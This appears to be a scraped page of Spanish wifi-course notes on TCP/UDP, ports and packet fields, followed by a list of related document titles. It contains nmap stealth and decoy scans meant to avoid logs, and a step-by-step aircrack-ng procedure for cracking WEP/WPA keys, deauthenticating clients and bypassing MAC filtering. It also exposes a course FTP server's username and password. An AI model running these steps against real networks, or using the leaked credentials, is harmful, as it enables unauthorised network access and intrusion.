19 Modulación: Cada canal o medio, transmite bien una serie de frecuencias y mal otra. Necesitamos dispositivos que transformen la frecuencia de la señal para que se transmita eficientemente la señal por el cable. Adecua la señal al medio físico, pero no varia la naturaleza de la señal. ANTENAS Según los ingenieros: λ para una frecuencia antena problemas en el cuaderno. Espectro de las ondas electromagnética. --- cuaderno TCP-UDP Son los dos grandes grupos de protocolo que se utiliza en las comunicaciones. TCP (Transmision Control Protocol) que es un protocolo orientado a conexión, y significa que tienen cierto control de la conexión. Necesita confirmación de la conexión por ambas partes. UDP (User Datagrama Protocol) es un protocolo no orientado a conexión. No necesita confirmación de la conexión, es decir, que el destinatario no tiene porque confirmar la receptición. PUERTOS LÓGICOS Usaban 8 bits, actualmente ya usan 16bits, y el numero de puertos que se pueden utilizar con 16bits son puertos(desde el 0 hasta el 56535). Los puertos se dividen en dos zonas: Menos de Normalmente son puertos protegidos. Están orientados a un tipo de protocolo. Estos son algunos puertos: Puerto 0: TCP-UDP. es reservado, no podemos usarlo. Puerto 1: TCP. Es un multiplexador de servicios. Puerto 5: TCP. Entrada de trabajo remoto. Puerto 7 echo : TCP-UDP. Eco. Puerto 9 discard: TCP-UDP. Descartar. Descarta toda la información que había recibido. Puerto 11 users: TCP-UDP. Usuarios activos. Puerto 13 daytime: TCP-UDP. Hora del día. Puerto 15 : TCP-UDP. Programar el estado de la red. Puerto 17 quote : TCP-UDP. Cita del dia, mandar un mensaje a alguien para hacer algo. Puerto 19 chargen: TCP-UDP. Generador de caracteres. Puerto 20 ftp-data: TCP. Protocolo de transferencia de archivos. Petición de descarga. Puerto 21 ftp : TCP. Es el puerto por el que recibe los archivos. Puerto 23 telnet: TCP. Conexión de terminal o consola. Puerto 25 smtp: TCP. Protocolo de transporte de correo sencillo. Protocolo de enviar correos. Puerto 37 time: TCP-UDP. Puerto 42 nameserver : TCP-UDP. Servidor de nombres de servidores. Le dice al equipo quienes son los servidores. Puerto 43 nicname: TCP-UDP. Le dice a los servidores quienes son los equipos..

20 Puerto 53 dns: TCP-UDP. Servidor de nombres de domino. Puerto 67 bootstrap: UDP. Servidor. Puerto 68 bootstrap: UDP. Cliente. Activación de la tarjeta de red para arrancar un equipo. Puerto 69 tftp: UDP. Es un FTP trivial. Es como una versión resumida del FTP. Manda un equipo a otro sin informar al receptor. Puerto 70 gopher: TCP. Es u nprotocolo de internet. Gophe:// Puerto 77 : TCP. Privado. Puerto 79 finger: TCP. Es un protocolo de internet. Finger:// Puerto 80 http (www): Hyper Text Transport Protocol. TCP. Son las paginas web. Puerto 93 dcp: TCP. Device Control Protocol. Protocolo de control de dispositivos. Si esta activo es que algun dispositivo se puede controlar desde remoto. Puerto 103 X400: TCP. Recibe correos X400. Puerto 104 X400send:TCP. Envía correos X400. Puerto 110 POP3: TCP. Recibe correo electronico. Post Office Protocol. Puerto 111 sunrp:tcp-udp. Llamada procedimiento remoto(rp) de SUN. Puerto 113 auth: TCP. Servicio de autentificación. Puerto 119 nntp : TCP. Transferencia de noticias. Es un protocolo de internet news:// Puerto 123 ntp : UDP. Protocolo de tiempo de red. Puerto 139 netbios: TCP. Protocolo de sesión NetBios. Protocolo de Microsoft para entenderse entre equipos de una red. Puerto 525 timeserver: UDP. Servidor de hora. Puerto 3306 : es tcp. MySql. Es el servidor de base de datos en MySQL... Puerto 3389: TCP.Es el administrador remoto de los sitemas WindowsNT. Mas de FLAGS: URG : Indica urgencia, es decir, cuando URG tiene un 1 significa que es relevante lo que pone en Urgent Pointer, si esta a 0, no tiene información el Urgent Pointer ACK : Reconoce una recepción correcta. Si esta a 1 se lee el campo Número de Confirmación, si esta esta a 0 no se lee. PSH: Push. Indica al receptor que elimine rápidamente el encabezado y los datos se lo pase a la aplicación, esto lo hace cuando esta en 1, es decir activado. RST: Reset. Si el bits esta activo, se reinicia la conexión en caso de error. SYN: Syncronize. Es el bit que marca el inicio de sesión, es decir, cuando esta activo y ACK no, el número de secuencia es el primero de la secuencia de paquetes. FIN: Finish. Cuando este bit esta activo, indica que es el ultimo paquete. DATAGRAMAS. Son paquetes de información que envían los ordenadores. Cada protocolo tiene su sistema de envío de datagramas. TCP: Posiciones de los bits del datagrama: Excel > datagramas.

21 En este protocolo, para transmitir necesitamos que ambos equipos estén de acuerdo en la comunicación. Esto se conoce como Conexión(negociación) en tres pasos: 1- El cliente manda un paquete con SYN=1, y un número de secuencia. 2- El servidor conesta con un paque con el SYN=1 y ACK=1, y pone otro número de secuencia y el inicial lo escribe en el campo confirmación. 3- El cliente manda el ACK=1 y en el número de confirmación pone el número de secuencia que envío el servidor. Durante la conexión, cada datagrama que se envia con el SYN=1, y se recibe confirmación con el ACK=1. El fin de la conexión se llama Negociación en cuatro pasos: 1- Uno manda el bit FIN=1. 2- El otro responde con el ACK=1 3- El primero responde con FIN=1 y ACK=1 4- Se acaba la conexión enviando el segundo con FIN=1 y ACK=1. Normalmente este ultimo paso ya no sirve, porque la conexión se suele cerrar en el paso 3. UDP: En este protocolo nadie pregunta por la recepción de los paquetes, y se utiliza para conexiones donde no importa perder algún paquete. Se usan mucho para las transmisiones de sonido y vídeo. Esquema > excel - datagramas No tienen un campo para el numero de secuencia, normalmente este protocolo utiliza parte de los datos para enviar el numero de secuencia, necesario para ordenar los paquetes en destino. La parte que se utiliza, son los primeros bits de los datos. Para saber cuando es el ultimo paquete, al menos tiene una linea entera de 0 al final, el paquete que tenga la última linea en 0, es el último paquete. ICMP (Internet Control Message Protocol): Se utiliza para transmitir mensajes entre equipos, de error, de fallos... Un usuario malintencionado podria utilizar este protocolo para mandar datos y mandar instrucciones al equipo. Son por ejemplo la instrucción PING. Esquema > excel datagramas Tipos: 0 Es el eco. Cuando realizas una llamada a un equipo y contesta. No lleva datos. 3 Destino inaccesible. 4 Disminución de origen. 5 Petición de redirección. 8 Solicitud de Eco. (PING) 11 Tiempo excedido en un datagrama. 12 Hay un problema con parámetros en un datagrama. 13 Solicitud de Timestamp(tiempo transcurrido en segundos desde el 1 de enero de 1970). 14 Respuesta de timestamp. 17 Solicitud de máscara de red. 18 Respuesta de máscara de red. IP:

22 Flags 1º- siempre es 0 2º DF- No fragmentación. Si se especifica este bit dice que el paquete es único (0100) 3º MF- Campo de verificación. Para verificar que el datagrama llega completo a su destino. Cuando este activo se lee con mucho cuidado la longitud total, se leen los campos encapsulados de cuantos van a ser y se enviara confirmación de que esta entero. Hay un datagrama del archivo mandado en el que esta este bit a cero, y es el ultimo. 4º es reservado. Protocolo: 1: ICMP 2: IGMP 6: TCP 17:UDP 115: L2TP > Usuario ftp servidor de clase: Carpeta personal. Dirección: ftp://fesbierzo.systes.net/cursowifi (exterior) /cursowifi (clase) Usar Filezilla para subir y bajar archivos FTP. Tamaño maximo 1Gb. User : wifi Password : fes$wifi WIRESHARK Filtro de captura: host ip (rastrea esa ip) Especificar un protocolo: Muestra los paquetes que incluyan ese protocolo. Poner unicamente el nombre protocolo que queremos especificar. Especificar puerto o rango de puertos: tcp.port == 80. Esto analizaria los paquetes del puerto 80. Par aun rango tcp.port > 1025 and tcp.port<2010. Especificar un equipo: ip.addr == ip. La comunicación que se establezca entre tu equipo y el otro. Para especificar un rango ip.addr==ip.0/24 Especificar la fuente: ip.src == ip Especificar destino:ip.dst == ip Protocol.srcport == puerto. Escanearia todas las solicitudes que viniesen por ese puerto del protocolo seleccionado. Negaciones : not tcp : mostraria todo lo que no fuese tcp not ip.addr == ip.. mostraria todo lo que no tenga que ver con esa ip. En nuevas versiones la negación sirve :! Sirven todas las operaciones condicionales : and, or, xor.

23 NMAP. Su entorno gráfico es ZENMAP. Utiliza un sistema de librerías (winpcap (windows) y pcap(linux/mac)). Estructura del comando: nmap [tipos de escaneo] [opciones] [equipo/s a atacar] Opciones: -T nº : esto es para forzar el time. Los valores son { }, cuanto mas alto el numero, mas rapido el escaneo, y cuanto mas bajo, mas lento. Sirve para hacer ataques masivos con los tiempos altos. Y para ataques sigilosos números bajos. Por defecto el time es el 3. -st: hace una llamada al sistema de conexión, sirve para hacer una conexión con todos los puertos, si el puerto esta abierto a la escucha, se conecta. -ss: Sigiloso. Sirve para minimizar el ruido que produce el programa. Inicia una conexión pero no la acaba. Manda un SYN, recibe un SYN y ACK, y termina la conexión. Al no terminar la conexión los ordenadores normales no registran esta petición al puerto. -sp: es un ping. Si eres administrador, manda en paralelo un paquete ICMP, y en vía paquetes con SYN y ACK (paquetes de respuesta). Se usa para detectar equipos en tu red. -su: se utiliza para saber que puertos UDP hay activos. En los sistemas UNIX no van a funcionar correctamente, en servidores. -sf : Manda el bit FIN activo. -sx : Xmas. Manda una trama en árbol. Principalmente para detectar sistemas operativos. -sn : Null. Intenta establecer una conexión nula, aunque en realidad esta mandando paquetes de cortes de conexión. La utilidad de estos tres, es en el caso de que el puerto este cerrado, ya que si le mandas una trama de finalización, los puertos cerrados dan respuesta y los abiertos no. Aunque en los servidores windows, no suele funcionar correctamente. -PTnº: numero de puerto, la forma correcta seria nmap -PTnº. Esto aria el escaneo seleccionado detrás al puerto seleccionado. La P es porque manda una comunicación TCP (ping) al puerto seleccionado. -R: es lo mismo que poner --dns-servers [ip-dns, ip-dns1...], pregunta en todos los servidores DNS. -O: informa sobre el sistema operativo. Algunas veces no puede, ya que los servidores suelen engañar sobre su S.O. nmap --osscan-guess nºip: muestra el S.O que mas se le parece al sistema operativo utilizado por el servidor, siempre que no descubra el que es. -p nº puerto, nºpuerto, nºpuerto-nºpuerto. Escanearía los puertos seleccionados. Los separados por se corresponde por rangos de puertos. -sv: intenta descubrir la versión de los servicios que se están usando en cada puerto. -v : mucha información, modo Vervose. Se pone detrás de cualquier conjunto, y nos muestra información adicional. Cuantas mas pongas, mas información obtendrás. -p0: No hacer ping. -p-: Indica todos los puertos, o lo que es lo mismo, escanearia todos los puertos. -PR: manda un ping ARP, de capa básica de red, y que esta activo si la tarjeta de red esta activa. Decoy (-D): engaño nmap -p 25,53 -sx -P0 -D , nºip: Inidicamos los puetos que queremos atacar, con escaner Xmas, y un no ping, con un Decoy. Los siguientes numero son IPS de otros equipos, pudiendo incluir la el mismo ordenador. Y al final la IP del equipo atacar. Estas Ips que ponemos son Ips desde las que atacar, quedando todas las ip registradas en los log. Si queremos usar algun shellscript creado para su utilización en nmap, tenemos que poner: nmap --script nom_script [opciones] nºip Algunos de los script son: nmap --script smb-os-discovery -p 445 nºip:intenta descubrir las vulnerabilidades y versiones de NetBios de los equipos windows, si es en un equipo Linux, informaría la versión del samba utilizado.

24 Ejemplos: nmap -ss P0 -sv -O : es una exploración intentando informar el S.O, las versiones del software hay en cada puerto, hace un ping nulo, es decir no va ha dejar secuencia, y el modo sigiloso para no dejar logs. Escaneo general sin hacer mucho ruido. nmap -st -n -p- -P : no manda ping, mira en todos los puertos, y no busca DNS (-n) para no dejar logs de petición en el servidor de DNS. Y con -st, nos intentamos conectar a todos los puertos. nmap -T5 -F -O -il archivo.txt: usado para detectar un sistema operativo. La opción -il. Realiza una lectura linea a linea del archivo seleccionado y la añade a la linea de comando. En el archivo seleccionado, podemos poner no solo las IP (una por linea) sino que los comandos deseados para esa IP. nmap -sv -n -P0 nºip -p22: tambien funciona poniendo los puertos a escanear al final del comando. nmap -sp -PR nºip: manda un ping ARP a la ip seleccionada. AIRCRACK-ng Instalar AIRCRACK-NG. Instalar tambien el macchanger. Programas de la suite aircrack-ng: 1- airmon-ng <start stop> <dispositivo> [canal]: Sirve para poner el modo monitor de la tarjeta. Una vez puesta en modo monitor, seguramente se creara una tarjeta virtual. ejem: airmon-ng start wifi0. Para poner la tarjeta en modo monitor sin usar aircrack-ng ifconfig wifi0 down : desconectar la tarjeta, iwconfig wifi0 mode [managed ad-hoc master monitor] if config wifi0 up 2- airodump-ng [opciones] <nom_dispositivo>: es el capturador de paquetes. Opciones: - - ivs : captura solo los vectores de inicialización, que son tramas de 24 bits. Sirve para ahorrar espacio en disco. Muy común para romper la contraseña de wi-fi. - -gpsd : para usar un gps. - -write (-w) <nom_archivo>: es el archivo de captura. Se tiene que poner el nombre del archivo. - -beacons: significa balizas. Señales que emiten los AP, router y antenas inalámbricas. Puede ser util para la utilización con GPS. - -chanel (-c) : Canal. Indicar el canal en el que queremos hacer la captura. -a : captura en la frecuencia de 5GHz. -abg : mira todas las frecuencias del rango a, b, g airodump-ng - -ivs -w prueba -c 11 -abg wifi0 : va a guardar un archivo con extensión.ivs con el nombre de prueba, rastreando el canal 11, realizano un salto de frecuencias entre los correspondientes a, b, g. airodump-ng -w prueba -c9 wifi0 : capturaría paquetes del canal 9, almacenándolos en un archivo.cap.

25 Airdump-ng muestra lo siguiente: CHX [DURACION BATERIA] [FECHA] BSSID PWR Beacons #Data CH MB EA/C ESSID La MAC del router Intensidad de señal Balizas Nº paquetes capturados Canal Tasa de transferencia Tipo encriptaciónnombre de red. OPN: ABIERTA WEP WPA WPA2 WPA-PSK WPA2-PSK aireplay-ng :se usa para inyectar trafico, cancelar autentificaciones(para obtener clave wpa) Ataques: 0- Desautentificación. Desconectar a un usuario de ese router, por lo que canta demasiado. 1- Autentificacion falsa. Te conectas al router o AP con una MAC falsa. 2- Selección del paquete a enviar 3- Reinyección ARP. 4- Chop-chop. Algoritmo Korek. Utiliza el algoritmo para averiguar trama de conexión directa de las tarjetas, usando CRC. Aireplay-ng a 00:11:22:33:44:55 -c 55:44:33:22:22:11 wifi0 0 : desautentificacion del cliente -a : mandar MAC del punto de acceso. -c : mandar la MAC del cliente al que quieres desenganchar. Si no especificas nada, desengancha a todos. Con aerodump en otra ventana. Aireplay-ng a MACap wifi0 aireplay-ng -3 -b MACap -h MACcliente :O:NUESTRA WIFI0 Esta combinación se llama reinyección ARP. El primer comando elimina a todos de la red, y luego el segundo inyecta paquetes hasta artarse. AIRCRACK-NG [OPTIONS] <ARCHIVOS-QUE CAPTURASTE CON AIRODUMP> -A ( AMODE):FUERZA EL ATAQUE (1= WEP; 2 =WPA-PSK -E (essid): solo lee paquetes los de ese ESSID. -b (Bssid): indicar la mac del atacado -q (quiet) : activa el modo silencioso, no muestra nada en pantalla hasta que la encuentre. -c : limita a caracteres alfanuméricos. -t :limita a caracteres hexadecimales. -h : solo numeros. -d<algoenhexadecimal> : busca solo claves que empiecen por ese texto. -m : igual que -b. Con -m ff:ff:ff:ff:ff:ff busca todas las MAC. -n {64 128} : para indicarle si la contraseña es de 64 o de 128 bits. CAMBIAR MAC DE TARJETA. Sudo ifconfig wlan0 down sudo ifconfig wlan0 hw ether MAC:Nueva sudo ifconfig wlan0 up

26 Cambiar ip con MACCHANGER sudo macchanger wlan0 MAC:NUEVA Si no funciona: Sudo ifconfig wlan0 down sudo macchanger wlan0 MAC:NUEVA sudo ifconfig wlan0 up Pasos para hackear red wifi: 1 -Ifconfig Iwconfig : para inalambrica Apuntar el nombre de nuestro dispositivo inalámbrico. 2- Si esta apagada, la ponemos a funcionar. Ifconfig nom_dispositivo up 3- airmon-ng start nom_dispositivo. Para poner la tarjeta en modo monitor. Crea una tarjeta virtual mon0. iwconfig, para comprobar si la tarjeta virtual esta arrancada, sino: airmon-ng start mon0 : no tiene porque ser necesario. 4- Cambio de MAC: ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up 5- airodump-ng mon0 : lista todos los paquetes. Apuntamos los datos BSSID PWR CH ENCRIPTACION y ESSID Cuando eligamos la red que deseamos, paramos airodump-ng con CONTROL-C 6- airodump-ng -c x -bssid mac_victima -w nom_archivo man0 : obtiene los paquetes de el canal elegido. Airodump-ng mon0 -w nom_archivo. si queremos los pasos 7 y 8 no los hacemos si hay trafico en la red. 7- Abrir nueva consola. aireplay-ng e nom_essid -a MAC_router -h mac_tar_red mon0 : es una falsa autentificacion. Si todo va bien, al final de una serie de letras, aparece sucessful :) 8- Si los datas (airodum-ng) suben despacio, tenemos que inyectar: aireplay-ng -3 -b MAC_router -h Mac_tar_red mon0: inyección ARP. Dejar que el numero de ARP. Si tienes muchos (120000), es que estas inyectando, sino, es que no estas inyectando. 9- Abrir nueva consola. aircrack-ng nom_fichero*.cap. Y dejarlo funcionando. Hasta que te de la clave. Aparece xxxxxxx mac_aparato, clave. INYECCION Cambio de MAC: ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0

27 ifconfig mon0 up AIREPLAY-NG -FAKEAUTH 0 -e nom_essid -a mac_victima -h mac_nuestra mon0. : Manda paquetes y sale un mensaje de... sucessfull :). método vago: aireplay-ng - -arpreply -b BSSID -h mac_nuestra mon0. Método agresivo, quita a todo dios. Aireplay-ng - -deauth 5 -a MAC_victima -c mac_nuestra mon0 FILTRADO MAC: Para saltarse le filtrado MAC de un router configurado con MAC necesitamos: 1- Si tiene el filtrado por MAC necesitmaos obtener una MAC válida de un cliente. Observando atentamente la salidas de airodum-ng. Para mandar una desautentificación, tiene que estar el equipo atacado, dentro de tu area de alcance. 2- Necesitamos el rango de IP, ya que sino no podemos conectarnos a esa. Proceso: Captura...cap (fichero de captura de paquetes). Están cifrados por la clave. WIRESHARK para descifrar el archivo: edit/preferences/protocols

Fedora Core GNU/LINUX

Fedora Core GNU/LINUX Fedora Core GNU/LINUX Entrega 8 Comandos básicos man Mostrar paginas de manual de otros comandos. man ls clear Limpia la pantalla. clear ls touch Listar los archivos y directorios de una ruta especifica.

Más detalles

GNU/Linux Administración Básica

GNU/Linux Administración Básica Networking Quality and Security 22 de marzo de 2006 Parte I Administración básica Directorios básicos Sistema / Directorio raíz. El resto de directorios cuelgan de él. /bin Mandatos binarios esenciales

Más detalles

Linux Principios básicos de uso del sistema [4ª edición]

Linux Principios básicos de uso del sistema [4ª edición] Introducción 1. Historia de Unix 11 2. GNU 13 2.1 FSF 14 2.2 CopyLeft y GPL 14 3. Linux 16 3.1 Características 18 3.2 Distribuciones 20 4. Qué distribución elegir? 20 4.1 Las distribuciones para el "gran

Más detalles

Montaje de particiones

Montaje de particiones Instituto Tecnológico de Costa Rica Programa Mantenimiento de Computadoras Personales Curso: Linux Profesor: Ing. Javier Pérez Rodríguez Montaje de particiones Ubuntu reconoce automáticamente la conexión

Más detalles

si por el contrario, queremos compilarlo, tendremos que realizar los siguientes pasos: cd netinvent./configure make make install

si por el contrario, queremos compilarlo, tendremos que realizar los siguientes pasos: cd netinvent./configure make make install Manual de usuario NetInvent (servidor) Netinvent se proporciona en una paquete comprimido en formato netinvent.tar.gz. Este formato es uno de los comúnmente utilizados para distribuir los programas bajos

Más detalles

La consola en GNU / Linux

La consola en GNU / Linux La consola en GNU / Linux Autor: Jesús Gil (Yisux) Qué es la consola? La consola o terminal (Shell) es un programa informático donde intercatúa el usuario con el sistema operativo mediante una ventana

Más detalles

SILLABUS CURSO : LINUX

SILLABUS CURSO : LINUX SILLABUS CURSO : LINUX Administración DURACIÓN : 8 sesiones de 3 horas cada sesión Horarios : Grupo 1 : Lunes Miércoles -Viernes (8:00 pm a 11 :00 pm) Grupo 2 : Martes Jueves ( 7:00 pm 10 :00 pm) SUMILLA

Más detalles

Guillermo López Leal, 2IM1 Introducción a la Seguridad Universidad Nebrija

Guillermo López Leal, 2IM1 Introducción a la Seguridad Universidad Nebrija Guillermo López Leal, 2IM1 Introducción a la Seguridad Universidad Nebrija Avisos Sólo es una demostración con fines educativos [en serio, en España no es ilegal, pero en otros países sí] No hagáis nada

Más detalles

Utfsm jmc. SO Linux. Redes. Miguel Varas

Utfsm jmc. SO Linux. Redes. Miguel Varas Utfsm jmc SO Linux Redes Miguel Varas Parte final del curso Servicios Internet [1] Minirepaso linux básico y redes [2] DNS [3] Servidor web [4] Servidor de correo [5] Administración de cortafuegos [6]

Más detalles

Crackin WiFi networks with security enabled

Crackin WiFi networks with security enabled Crackin WiFi networks with security enabled En el articulo sobre cómo configurar la conexión a Internet ya hablamos de las diferentes formas que hay para proteger una red wireless (Wi-Fi), de las cuales

Más detalles

El Sistema Operativo Linux

El Sistema Operativo Linux Introducción El Sistema Operativo Linux La mayor parte de los ordenadores que existen en la actualidad están diseñados de forma que puedan ejecutar diversas tareas o programas. Es evidente, que si cada

Más detalles

Licencia de Publicación

Licencia de Publicación Manual Mantenimiento Básico de servidores basados en GNU/Linux Universidad Nacional Heredia, Costa Rica Actualizado al 06 de Agosto de 2009 Por: José Pablo Carvajal Chaves Para efectos de la ejecución

Más detalles

TUTORIAL DE AIRCRACK-NG

TUTORIAL DE AIRCRACK-NG TUTORIAL DE AIRCRACK-NG Taller Realizado en FLISOL Los Ángeles Abril 25 de 2009.- Paolo Norambuena paolo.norambuena@gmail.com AIRCRACK-NG Esta es una guía con fines educativos para el uso y manipulación

Más detalles

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA ASALTANDO REDES WI-FI WEP / WPA Aetsu alpha.aetsu@gmail.com Esta obra se encuentra bajo la licencia Creative Commons 3.0 España: 1 Cifrado WEP Todos los ataques En esta parte del manual explicaré de forma

Más detalles

GUÍA DE INSTALACIÓN DE SLACKWARE LINUX 11.0 v. 1.0

GUÍA DE INSTALACIÓN DE SLACKWARE LINUX 11.0 v. 1.0 GUÍA DE INSTALACIÓN DE SLACKWARE LINUX 11.0 v. 1.0 Autor: eli@s (Elías Cuellar Rodríguez) Licencia: GPL Fecha: 20 de Abril de 2007 UNIVERSIDAD PERUANA UNIÓN FACULTAD DE INGENIERÍA EAP de Ingeniería de

Más detalles

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas Laboratorio de Seguridad en aplicaciones web Practica 2: Configuración de VPN y escaneo de puertos. Objetivos: En esta práctica

Más detalles

TEMA 2: GESTIÓN DE ARCHIVOS

TEMA 2: GESTIÓN DE ARCHIVOS Tema 2: Gestión de archivos. GNU/LINUX 1/6 TEMA 2: GESTIÓN DE ARCHIVOS Este tema cubre la gestión básica del sistema de archivos (archivos, directorios y links) de GNU/LINUX mediante las órdenes disponibles

Más detalles

1. Configuración de una tarjeta de red en Linux...2. 2. Medidas de seguridad a configurar en el router...5

1. Configuración de una tarjeta de red en Linux...2. 2. Medidas de seguridad a configurar en el router...5 1. Configuración de una tarjeta de red en Linux...2 1.1 Comprobar que la tarjeta de red está detectada... 2 1.2 Comprobar la configuración... 3 1.3 Ficheros de configuración de la red en Linux... 3 1.3.1

Más detalles

1. CARACTERÍSTICAS DE LINUX.

1. CARACTERÍSTICAS DE LINUX. UNIDAD 1: EL SISTEMA OPERATIVO LINUX 1. CARACTERÍSTICAS DE LINUX. El sistema operativo LINUX es un conjunto de programas y una serie de utilidades que permiten al usuario gestionar los recursos hardware

Más detalles

Manual de Instalación y Configuración

Manual de Instalación y Configuración Manual de Instalación y Configuración Sí Servidor Estatal SSIE - Estatal v.10.2 Mayo, 2015 Nombre del Manual Instalación y Configuración Servidor Estatal SSIE-Estatal v.10.2 Unidad responsable de la Elaboración

Más detalles

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas Laboratorio de Seguridad en aplicaciones web Practica 1: Guía de configuración de laboratorio objetivos: Familiarizar al estudiante

Más detalles

LINUX - El intérprete de órdenes II

LINUX - El intérprete de órdenes II LINUX - El intérprete de órdenes II Objetivos: Se pretende introducir al alumno en el uso del intérprete de órdenes bash de LINUX. Ejecución de órdenes en el intérprete de órdenes Orden simple Como ya

Más detalles

Si están trabajando en un computador real, lo primero que deben colocar los discos de manera SCSI, como mínimo deben de ser dos.

Si están trabajando en un computador real, lo primero que deben colocar los discos de manera SCSI, como mínimo deben de ser dos. Rocío Alt. Abreu Ortiz 2009-3393 RAID 0 en Debian RAID (del inglés Redundant Array of Independent Disks, «conjunto redundante de discos independientes») hace referencia a un sistema de almacenamiento que

Más detalles

TP N 7 Comandos "mount" y "umount"

TP N 7 Comandos mount y umount Taller de GNU/Linux 2002 TP7 hoja 1/5 Universidad Nacional de La Matanza Ingeniería en Informática-Taller de GNU/Linux TP N 7 Comandos "mount" y "umount" Objetivos: Comprender los nombres utilizados por

Más detalles

UNIDAD DIDACTICA 8 MONTAR Y DESMONTAR UNIDADES EN GNU/LINUX

UNIDAD DIDACTICA 8 MONTAR Y DESMONTAR UNIDADES EN GNU/LINUX UNIDAD DIDACTICA 8 MONTAR Y DESMONTAR UNIDADES EN GNU/LINUX Eduard Lara 1 1. INTRODUCCIÓN En los sistemas GNU/LINUX y UNIX los dispositivos como los discos duros y sus particiones, el terminal de pantalla,

Más detalles

Programas de Administración de red

Programas de Administración de red 1 Programas de Administración de red Introducción El propósito de las siguientes prácticas es el de familiarizar al alumno con los distintos programas que se utilizan para chequear y comprobar el estado

Más detalles

Proceso de Clonado por Multicast

Proceso de Clonado por Multicast Proceso de Clonado por Multicast Con el fin de lograr un clonado de imagen de disco lo más homogéneo y rápido se puede recurrir a diversas herramientas, mucha de ellas licenciadas que requieren un costo

Más detalles

Sistemas de Ficheros en GNU/Linux

Sistemas de Ficheros en GNU/Linux en GNU/Linux Page 1 Nota de Copyright 2005. Algunos derechos reservados. Este trabajo se distribuye bajo la licencia Creative Commons Attribution-ShareAlike. Para obtener la licencia completa, véase http://creativecommons.org/licenses/by-sa/2.1/es

Más detalles

Certificación LPIC-1, examen 117-101

Certificación LPIC-1, examen 117-101 Certificación LPIC-1, examen 117-101 NOTA: Este documento contiene un listado de preguntas tipo para el examen 117-101 de la certificación LPIC-1 realizado en marzo de 2011. La fundación LPI no permite

Más detalles

REDES DE COMPUTADORES Laboratorio

REDES DE COMPUTADORES Laboratorio 1nsloo.cl REDES DE COMPUTADORES Laboratorio Práctica 1: Emulación de redes con NetGUI. 1. OBJETIVOS. El objetivo de esta práctica es aprender a utilizar la herramienta de emulación de redes Netkit / NetGUI,

Más detalles

Práctica 8: El analizador de protocolos Ethereal

Práctica 8: El analizador de protocolos Ethereal Práctica 8: El analizador de protocolos Ethereal Los analizadores de protocolos o de red, también conocidos vulgarmente como sniffers son herramientas de gran ayuda para los administradores de las redes

Más detalles

La Jerarquía de Sistema de Archivos Estándar en GNU/Linux (FHS)

La Jerarquía de Sistema de Archivos Estándar en GNU/Linux (FHS) La Jerarquía de Sistema de Archivos Estándar en GNU/Linux (FHS) [ admin basico gnu ] Marcelo López Minnucci 17 de octubre de 2015 Objetivo del tutorial Conocer la ubicación estándar

Más detalles

WireShark. Este instructivo describe el uso del programa WireShark (antes llamado Ethereal) para examinar paquetes en una red de datos.

WireShark. Este instructivo describe el uso del programa WireShark (antes llamado Ethereal) para examinar paquetes en una red de datos. Redes de Datos - Laboratorio Objetivo WireShark Este instructivo describe el uso del programa WireShark (antes llamado Ethereal) para examinar paquetes en una red de datos. Analizadores de Protocolos de

Más detalles

DESARROLLO DE FUNCIONES EN EL SISTEMA INFORMÁTICO EJEMPLO DE CUESTIONES BÁSICAS A CONOCER:

DESARROLLO DE FUNCIONES EN EL SISTEMA INFORMÁTICO EJEMPLO DE CUESTIONES BÁSICAS A CONOCER: DESARROLLO DE FUNCIONES EN EL SISTEMA INFORMÁTICO EJEMPLO DE CUESTIONES BÁSICAS A CONOCER: 1) Para que sirve la función wait ( & dato ) y que valor se obtendría en la variable dato. 2) Diferencias entre

Más detalles

UNIDAD DIDACTICA 2 COMANDOS BÁSICOS DE LINUX

UNIDAD DIDACTICA 2 COMANDOS BÁSICOS DE LINUX UNIDAD DIDACTICA 2 COMANDOS BÁSICOS DE LINUX Eduard Lara 1 1. SISTEMAS DE FICHEROS DE LINUX Todos los sistemas operativos estructuran sus objetos en una estructura jerárquica en forma de árbol que contiene

Más detalles

Migración de disco duro en Debian GNU/Linux Wheezy

Migración de disco duro en Debian GNU/Linux Wheezy Migración de disco duro en Debian GNU/Linux Wheezy Rafalinux 1 de enero de 2013 Hace unas semanas me cascó la fuente de alimentación y la placa base. Desafortumadamente tuve que cambiar prácticamente toda

Más detalles

Creación de Scripts. Qué es un script? Como funciona un shell script en Linux?

Creación de Scripts. Qué es un script? Como funciona un shell script en Linux? Creación de Scripts Qué es un script? Un guión o script es un fichero de texto que contiene una serie de instrucciones que se pueden ejecutar en la línea de órdenes, y que se ejecutarán seguidas. En ese

Más detalles

ANEXO A: Guía de instalación de Debian GNU/Linux 4.0.

ANEXO A: Guía de instalación de Debian GNU/Linux 4.0. Técnico en Repatación de PC y Redes (intensivo) ANEXO A: Guía de instalación de Debian GNU/Linux 4.0. Introducción. La presente guía indica el paso a paso para instalar la version 4.0 de Debian GNU/Linux

Más detalles

Ethereal. Este instructivo describe el uso del programa Ethereal para examinar paquetes en una red de datos.

Ethereal. Este instructivo describe el uso del programa Ethereal para examinar paquetes en una red de datos. Instituto de Ingeniería Eléctrica Redes de Datos. Objetivo. Ethereal Este instructivo describe el uso del programa Ethereal para examinar paquetes en una red de datos. Analizadores de Protocolos de Red.

Más detalles

CONFIGURACIÓN DE NFS

CONFIGURACIÓN DE NFS PRACTICA No. 13 OBJETIVO: Conocer el tipo de transmisión que ofrece NFS, como el protocolo y la configuración para la exportación del volúmenes y poder compartirlo. INTRODUCCIÓN: NFS (Networking File System

Más detalles

Administración de Sistemas Operativos

Administración de Sistemas Operativos Kernel 2.4, 2.6.x Comunicaciones Aplicaciones Aplicaciones Utilidades Kernel del sistema Usuarios Gestión de archivos y seguridad Shell Lenguajes Programadores 1 DISTRIBUCIONES DE LINUX PARTICIONES Recomendado:

Más detalles

Instrucciones de instalación de IBM SPSS Modeler Server 17 para UNIX

